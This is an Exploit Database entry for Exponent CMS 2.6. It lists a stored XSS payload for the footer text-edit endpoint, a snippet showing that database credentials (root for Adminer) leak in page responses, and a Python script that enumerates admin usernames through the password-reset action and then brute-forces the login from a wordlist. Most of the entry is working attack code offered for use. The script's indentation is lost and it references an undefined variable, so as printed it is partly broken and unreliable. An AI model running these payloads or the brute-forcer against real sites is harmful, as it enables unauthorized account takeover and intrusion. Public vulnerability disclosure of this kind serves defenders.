Exponent CMS 2.6 – Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： heinjame
  日期： 2021-12-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50611/

• # Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
  # Exploit Author: heinjame
  # Date: 22/10/2021
  # Exploit Author: picaro_o
  # Vendor Homepage: https://www.exponentcms.org/
  # Version: <=2.6
  # Tested on: Linux os
  
  *Stored XSS*
  
  Affected parameter = >
  http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
  Text Block)
  
  Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  
  ** *Database credential are disclosed in response ***
  
  POC
  ```
  var adminerwindow = function (){
   var win =
  window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
   if (!win) { err(); }
   }
  ```
  
  **Authentication Bruteforce*
  ```
  import argparse
  import requests
  import sys
  
  parser = argparse.ArgumentParser()
  parser.add_argument("url", help="URL")
  parser.add_argument("Username list", help="Username List")
  parser.add_argument("Password list", help="Password List")
  pargs = parser.parse_args()
  
  host = sys.argv[1]
  userlist = sys.argv[2]
  passlist = sys.argv[3]
  
  try:
  readuser = open(userlist)
  readpass = open(passlist)
  except:
  print("Unable to load files")
  exit()
  def usernamebrute():
  s = requests.Session()
  for username in readuser.readlines():
  brute={
  'controller':(None,'users'),
  'src':(None,''),
  'int':(None,''),
  'action':(None,'send_new_password'),
  'username':(None,username.strip()),
  }
  bruteforce = s.post(host+"/index.php",files=brute)
  status = s.get(host+"/users/reset_password")
  if "administrator" in status.text:
  print("[+] Found username : "+ username)
  adminaccount = username
  checkpoint = True
  return adminaccount,checkpoint
  break
  
  def passwordbrute(adminaccount):
  s = requests.Session()
  s.cookies.set("csrftoken", "abc")
  header = {
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
  Gecko/20100101 Firefox/78.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Language': 'en-US,en;q=0.5',
  'Accept-Encoding': 'gzip, deflate',
  'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
  'Referer': host+'/login/showlogin'
  }
  for password in readpass.readlines():
  brute={
  'controller':'login',
  'src':'',
  'int':'',
  'action':'login',
  'username':adminaccount,
  'password':password.strip()
  }
  bruteforce = s.post(host+"/index.php",headers=header,data=brute)
  # print(bruteforce.text)
  status = s.get(host+"/login/showlogin",cookies=csrf)
  print(status.text)
  if "Invalid Username / Password" not in status.text:
  print("[+] Found Password : "+ password)
  break
  
  adminaccount,checkpoint = usernamebrute()
  if checkpoint == True:
  passwordbrute(adminaccount)
  else:
  print("Can't find username,We can't proceed sorry :(")
  
  ```